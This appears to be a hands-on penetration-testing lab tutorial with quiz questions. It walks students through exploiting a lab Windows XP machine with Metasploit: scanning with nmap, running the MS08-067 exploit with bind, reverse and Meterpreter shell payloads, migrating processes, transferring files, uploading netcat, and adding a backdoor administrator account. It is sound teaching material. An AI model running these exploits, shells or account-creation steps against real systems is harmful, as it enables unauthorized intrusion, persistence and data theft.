Exploitation using the Metasploit Framework (MSF)

Press this button to ready your machine for running with the virtual machine targets. If your machine is reset or you reboot then you may have to press this button again.

Note that this target can take (quite) a few minutes to boot, as it has many processes running many services.

The machine can take a few minutes to warm up. Press the test button to see if it is running fully. So long as the network of the target is running, you can continue to the next question while you wait for the XP target.

Target 1 lies somewhere in 192.168.1.1 - 192.168.1.254. This time use "ip route show" and find out the device name on your machine which would be used to handle packets going to target 1. You can identify it by looking at the output, finding the line involved with the target subnet, and looking for the "dev".

Target network device:

What is your machine's IP number on the target network?

Your IP:

The target needs to be running before starting this question.

Use nmap to sweep the target network, and identify the IP address of target 1. Use the appropriate flags to keep this scan efficient.

Target IP:

On the target machine, list the first 3 port numbers found in numerical order using a standard nmap portscan of the common ports open on the target.

Open port 1
Open port 2
Open port 3

Before we use the Metasploit Framework, lets check the MSF database is running, and start it if not. Start the MSF database:

sudo msfdb start

Start the Metasploit Framework console interface.

msfconsole

We would typically now perform a vulnerability scan against our target using a full blown scanner such as OpenVAS.

As Windows SMB services are running we could perform a quick assessment using the nmap NSE Scripts under the category vulns, which checks for some of the most well know vulnerabilities.

Note: Some of the scripts are marked as intrusive and unsafe, which means they could crash the target system, so would not be used in a production environment.

Documentation of the Nmap SMB Vulnerability scanning Scripts under vuln: https://nmap.org/nsedoc/categories/vuln.html

nmap --script vuln 192.168.1.x

Note if the target fails during the test, go to the bottom of the tutorial and click the button to stop the target, then go to the top of the tutorial and use the buttons to restart and test the target.

What CVE-rated issue was identified with a year of 2017?
CVE issue in 2017 identified CVE-2017-ms17 CVE-2017-0001 CVE-2017-0119 CVE-2017-0143 CVE-2017-1143 CVE-2017-1919 CVE-2017-3143 CVE-2017-4250

Explore Metasploit via the File System

The various elements of the MetaSploit Framework (MSF) are stored under the directory /usr/share/metasploit-framework including the exploit and payload Ruby scripts themselves.

Change to this directory, and list the contents.

Figure 2: metasploit directories

Which directory holds the built in vulnerability scanners?
/usr/share/metasploit-framework/

Change to the exploits directory and list the contents.

How are the exploits sorted?
By Date By Attacker's OS By Target's OS By Author By Version By Size
Where might exploits which work on several different OS's be stored?
dialup qnx multi sap realserver

Change to the directory where the Windows exploits are, and list the contents.

How are the Windows exploits sorted?
By Date By Attacker's OS By Target's OS By Author By Target Application By Size
Note : The exploits contained here are for the OS and applications which run on the OS.

Change to the directory where the Windows Server Message Block (SMB) exploits are, and list the contents.

Edit one of the Ruby exploit scripts (or use less to view), for the well know vulnerability MS08_067.

What is the associated CVE for this exploit script? Use the format "CVE 2025-0001".

Google for the CVE and check the mitre database (cve.mitre.org) - What date was the vulnerability entry first published? Use the format 2025-12-31.

Try to find the Exploit-Db entry(s). What is the lowest-numbered entry?

From your research which versions of Windows XP Professional are vulnerable?
xp xp SP1 only xp SP2 only xp SP3 only xp SP1 and SP2 only xp SP2 and SP3 only xp SP1 SP2 and SP3 only

Change into the singles payload directory, and then into the windows payloads directory.

Which payload would be used to create a new user on the target machine?

Which payload would be used to create a TCP listener on a port on the target, and create and bind a command shell to it?

Examine the newuser.rb script.

Which Windows command is executed on the target machine to create the new user?
cmd.exe useradd cmd.exe adduser cmd.exe /c net useradd cmd.exe /c net adduser cmd.exe /c sudo useradd cmd.exe /c sudo adduser cmd.exe /c admin alter user powershell mode 10 cmd.exe /c net passwd cmd.exe /c net user cmd.exe /c user net cmd.exe /c administrator update priveleges

Examine the shell_bind_tcp.rb script and review the payload itself.

Approx. how many bytes of shellcode are in the payload?

Now the Metasploit Framework services are running we can explore the various parts of the framework.

Figure 3: Metasploit framework

There are several interfaces we can use to interact with the framework exploit/payload/auxiliary modules. MSF (MetaSploit Framework) including the msfcli, msfconsole, and a web-based interface.

You should have already started the metasploit console, but if not start the Metasploit MsfConsole interface from a terminal window. You should get a strange and fairly unique ascii graphic:

Figure 4: Console

Which version of Metasploit is reported? It is in the form "v0.0.0" or "v0.0.0-string".

How many exploits does it contain?

How many payloads does it contain?

Use the show exploits command to list all available exploits. We can Mix and match Exploits and associated Payloads using MSF, as shown below:

Figure 5: Exploit Modules

The search command can help us find useful exploits. Use search -h to check the help for the command.

Note: for older versions of MSF you may need to run db_rebuild_cache if MSF reports the cache isn't built or needs rebuilt.

Use the search type:exploit name:smb command to list only the windows smb exploits:

Figure 6: Search

Use the search command to list the exploit modules have been added in 2020.
How many exploit modules were added?

What is the exploit module filename for this?

Which type of memory mgt exploit is this?
Permissions overlay Stack hijack Use after free Buffer Underflow Buffer Overflow
Is it a remote/client-side/local exploit?
Client-side Remote local cloud-based

Each Exploit and Payload has information related to it stored in the framework. Select a payload name form the show command and use the following command to display details about the respective modules. View several to get a feel for the structure of information provided.

info <Name Of Payload/Exploit>

(Use the <TAB KEY> to auto complete commands and values, or cut and paste the full name)

Search for the windows smb netapi exploits. Find the netapi exploit name of the ms08_067 exploit, and copy it from the screen.

Figure 6: netapi module

The MSF command use allows us to select an exploit module to use. Paste the exploit name onto the msfconsole command line:

use exploit/windows/smb/ms08_067_netapi

What has the msfconsole prompt changed to?
netapi use attack exploit

We now in exploit command mode. If you check the help now, you should see we have more commands. The info command gives details on this particular exploit.

The show options command can now be used to check the options for the selected exploit

Figure 7: show options

From the file system, find the exploit module and review the contents.

Figure 8: Module Review

Which CVE number is listed in the exploit module code, in the format CVE-xxxx-xxxx?

Look up the vulnerability on the NVD database online. Which CWE category is listed against the vulnerability, in the format CWE-xx?

Is it a remote/client-side/local exploit?
local remote client-side cloud-based

This is a remote exploit for the vulnerability in the Windows SMB network server service.

Figure 9: SMB Layout

Payloads and Options
To check the possible payloads compatible with this exploit module, use the show payloads command.

Figure 10: Possible Payloads

Try using the msf grep command to filter out bind shells

Figure 11: Bind Grep

Note the msf grep command can take flags. You can check those out using "grep help".

How many bind shell payloads are compatible with the selected exploit?

The set command can be used to set the PAYLOAD option for our exploit.

Try typing set PAYLOAD <TAB KEY> <TAB KEY> and autocomplete should show all possible payloads and page nicely.

We can select a Bind Shell payload to add to our Exploit, which will start a listener on the target, allowing Metasploit to connect, and then the payload will spawn a shell and bind this shell to the connection.

Figure 12: Bind Payload

Select the name of a windows TCP Bind Shell payload shown below (copy+paste or use auto complete for the payload value – using TABs, or use the index from the search output):

Figure 13: Select the correct payload

Note: If you type set PAYLOAD windows/shell<TAB><TAB> MSF displays only the possible windows shell-based payloads for the exploit.

The payload we are using here is "windows/shell_bind_tcp", and not any other payload by a similar sounding name or in a different directory.

Which type of bind shell payload is this single/staged?
direct single staged mangled

The show options command can now be used to check the options for the selected exploit and payload modules selected:

Figure 14: Payload Options

Note: the separate sections for the Exploit and Payload options.

Which option is mandatory and currently not set?

Set any mandatory options needed to run the exploit; in this case possibly the target host. (Check the Required col, and use the set msfconsole cmd)

Check the options have been set correctly using show options again (or use up arrow twice).

Which port is the Bind Shell payload going to start the listener on? Can you draw your own diagram with the smb service, bind shell listener, and network communications?

To send the exploit and payload to the target use the exploit command. (got to be the best cmd in any tool ever!)

You should see helpful debug messages until you get a message saying if the exploit was successful or not. If the exploit is successful, the payload should execute, and the action should be carried out.

If the exploit was successful you should get a cmd shell on the target!

Figure 15: Remote Shell Open

Did the exploit work, and has the shell payload been launched? Check using the Windows ipconfig command.
What is the IP Address of the target reported from the ipconfig command?

In a Kali cmd shell, check the connection of our payload using

    ss -a |grep 4444
  

Use the Windows cd command to check the working directory, and the dir command to check the contents of the current directory.

What is the current working directory, using cd?

We can use environment variables to find out some useful information. Try set COMPUTERNAME, which is the local name for this machine.
What is the current COMPUTERNAME?

From the Target machine shell, check the network services running and especially any established connections using netstat -an

It should look similar to the following:

Figure 16: Netstat example

Identify the bind shell MSF payload connection?
What are the port numbers used in the connection?
Target end: msfconsole end:
Check the associated processes for the payload connection using the netstat command and adding the -o flag
Can you identify the process id (pid) for the bind shell MSF payload connection?

Review the running executables and the associated processes using the windows command tasklist
Can you identify the executable process the bind shell is attached to?

Run tcpdump or Wireshark and filter for your Meterpreter connection. Check if you can view the commands and shell output in the connection.

What tcpdump command filters for the payload connection? Do it in ASCII, use the local bridge device, and select the known msf port number.
sudo tcpdump -ni port
Can the shell content be captured and understood?
no yes

Let's logon to our target and check these things.

From Kali, open a new terminal windows and get a VNC remote desktop to the target, using the vncviewer tool. From the new terminal window type:

vncviewer :1

Validate the IP Address of the target and working directory from a Windows command window.

Figure 18: Commands in target 1 using VNC

On the Target machine, again check the listening services and established connections using netstat -an

From Kali, check the listening services and connections using ss -ln and ss -an

Once the question is complete, exit from the remote shell inside msfconsole, using the exit command or CTRL C.

What is the IP number of the server (listener)?

Which is the IP number of the attacker?

Is the listener on the target or on the attacking machine?
target machine attacking machine

Now we can try the same exploit with a different payload. Keep using the ms08_067_netapi exploit. This time we will use a Reverse Bind Shell payload. This creates a Listener (a Handler) on Kali, and the exploit connects back and binds a shell to the connection.

Figure: Reverse Shell

From Kali, we can use the same exploit, but this time let's swap the payload for a TCP Reverse Bind Shell payload, and set the PORT for the listener to 777.

Figure: Setting the payload

Check the options with show options

Why do you have to set a listener port?
You dont So you can connect to the listener in the target As a backup if the direct connection fails Needed in order to build a reflection attack Required to encrypt the channel So the target payload can connect back to the client
Which type of shell payload is this single/staged?
direct single staged mangled

Figure: Options Needed

Set the options needed and run the exploit against the target XP machine.

Did the exploit work, and has the reverse shell payload been launched? Check using ipconfig command

From Kali, check the listening services and connections using ss -ln and ss -an

On the target server and check the listeners and connections using netstat -na

Which machine is the client and which is the server (handler) for this payload?
Kali machine is What? Client Server and Windows machine is the What? Client Server

Sessions
Sessions are the currently connected payloads. To keep the reverse shell payload session and work on another, we can put the connection into the background with <CTRL+Z> from the shell we have.

Figure: Background Session

To interact with the session again we can use sessions -i sessionnumber

Figure: Rejoin a session

To kill a session again we can use sessions -k sessionnumber.

Note: The back command can be used to exit out of the exploit command mode, if you want to change to a different exploit.

The Meterpreter or "MetaSploit Interpreter" shell payload is the most powerful MSF payload, and improves on a target cmd.exe shell. It is a staged payload and implemented as DLLs which is injected into the exploited processes memory (so has no footprint on the target disk).

Figure: Shell payload

Review the various Meterpreter payloads using:

set PAYLOAD windows/met <TAB><TAB>
  

Figure: Payload Options

Use a Reverse TCP Meterpreter Shell payload, and check the options needed.

MAKE SURE to change the listening port. Set the listening port to be 799.

Which machine will run the listener (the reverse handler) on the specified port?
Which machine? The metasploitable 2 machine The kali machine The target machine The reflector node

Before running the exploit, in your other terminal window, check the listening ports on Kali using ss –ln

Run the exploit, delivering the Meterpreter payload.

Figure: Run the exploit

From Kali, check the services running and established connections using ss –an.

On the Target machine, check the listening services running and connections using netstat –an

Should be similar to the below:

Figure: netstat output

Which port is the listener for this payload?

Which port is used on the target?

In the Meterpreter shell, we have a range of Meterpreter commands for Windows target post exploitation. The UPARROW key and TAB key work. Check the Meterpreter shell help using the Meterpreter command?

Note: Use the lecture notes as reference, and most commands have help via -h

Which Meterpreter command gets information about the target system?

Which Build of XP is reported by the command?

Check the network address of the target with the Meterpreter ipconfig command

Figure: ipconfig output

What is the MAC Address of the target systems Ethernet interface?

Run tcpdump or Wireshark and filter for your Meterpreter connection. Check if you can view the commands and shell output in the connection.

What tcpdump command filters for the payload connection? Do it in ASCII, use the local bridge device, and select the known msf port number.
sudo tcpdump -ni port
Can the shell content be captured and understood?
no yes

Check the username we are running as on the target using the Meterpreter command getuid

What is the user we have inherited on the target? Use the form DOMAIN\USERNAME

Why is this?
This is the default user for all exploits This is the username running metasploit in kali This is the nickname of the kali user Metasploit created this username during the attack This is the user which was running smb This was the user running the windows firewall This is just a fake username, as the exploit did not really log in

From the Meterpreter shell, check the running processes on the target using getpid and ps

Find the process id of the exploited process which Meterpreter is running inside.

What is the process id which Meterpreter is running in?

What is the name of the process?

If we had exploited a process which may have crashed, or the user might close, Meterpreter facilities moving processes. We would typically migrate to a process which will not terminate.

What is the process id of the winlogon.exe process?

From the Meterpreter shell use the migrate command to move processes to the winlogon.exe process.

What is the process id which Meterpreter is now running in? Verify this using getpid.

What is the name of the process?

Check the current working directory with the Meterpreter command pwd

What is the current working dir?

Create a directory c:\test on the target machine using the Meterpreter command mkdir. Check it has been created using cd and ls.

Note it is easier to cd and mkdir, then ls. In the metasploit shell, it uses unix-like slashes, rather than window-like slashes, so it is "cd c:/" not "c:\". Confusing!

Figure: cd and ls

Downloading Files
Use Meterpreter command lcd to change to /home/kali user's home directory on the Kali machine. Then change to the Windows directory on the target box. Download the winnt.bmp file from the target using the command download

What size is the downloaded file in bytes?

The search command can be useful in finding files on the target. Locate all the ntuser.dat.log files.

Which common directory are all these files under? Include the drive letter and the trailing slash, using Windows slashes. It is case sensitive, and the volume is returned in lower case.

Uploading Tools
Kali provides us with many useful tools which we can upload to a target. From Kali, change to the /usr/share/windows-binaries directory and list the contents. In the Meterpreter shell, change to the c:\test dir on the target machine. Use the upload command to upload the nc.exe Windows netcat executable to the target machine.

Figure: upload example

We could now use this to port scan an internal network... only if that was part of the penetration testing rules of engagement/scope of agreed testing!

Windows Shell
We can also spawn a cmd.exe shell on our target. This extra layer of shell can be useful as if the cmd.exe crashes or exits for some reason, we still have out Meterpreter shell and can create another shell.

Try the shell command:

Figure: running the shell

Now from the new shell, use the Windows tasklist command to display the running processes on the target.

What is the process id of this cmd.exe shell?

Does the cmd cls clear the screen as it is meant to? Why not?
cls need direct driver controls You dont have enough privileges Clear screen control codes are not compatible with metasploit It does work cls need a bidirectional interface based on vt100 The terminal type is based on RFC1915 cls is implemented by the GUI and not the terminal

Windows Command Line Fun
Check the user accounts on the target with:

net user

As we have SYSTEM privileges lets add a user to the target machine for future use. This type of activity would have to be within your rules of engagement and perhaps discussed with the customer!

  net user username userpasswd /add
  

Figure: user add example

Add a new user called "rich" with password "richpass". Verify this using "net user".

Figure: check user added example

Check the user accounts which are in the local administrator group on the target with:

net localgroup administrators

This could be interesting as often the same local admin accounts are duplicated across different systems in a domain. Lets upgrade our new user account, and add it to the local administrator group:

net localgroup administrators username /add
  

Figure: changing a user to an admin

We can use the windows shell to review machines the target has been in contact with, which could be interesting to check if they are in the scope of the penetration test. For example by dumping the target's ARP cache:

arp -a

What mac address has been learned? Use the lowercase format with "-" between the groups.

If we only have a Windows cmd line, we can use the dir cmd to do searches on the filesystem. Make sure your current directory is C:\

Try searching for all pdf file with:

dir "\*.pdf" /s

Can you produce a cmd to search for all log files in a similar way? What is the filename of the last log file found using this technique

Can you find any files ending in ".pif"? What is the filename called?

THIS BUTTON IS ONLY NEEDED IF TARGET MACHINE IS RUNNING BUT BECOMES UNRESPONSIVE OR DAMAGED. That is rare. You can also use this button if you are finished with the tutorial and simply want to shutdown all the targets.